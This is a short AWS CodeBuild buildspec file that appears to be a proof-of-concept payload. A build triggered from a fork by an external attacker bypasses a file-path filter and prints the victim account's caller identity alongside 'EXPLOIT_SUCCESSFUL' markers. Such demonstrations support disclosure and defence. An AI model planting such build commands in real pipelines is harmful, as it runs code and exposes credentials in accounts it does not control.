version: 0.2
phases:
  build:
    commands:
      - echo FILE_PATH_BYPASS_CONFIRMED
      - echo Build triggered from FORK by external attacker tap198
      - echo Victim account credentials below
      - aws sts get-caller-identity
      - echo EXPLOIT_SUCCESSFUL
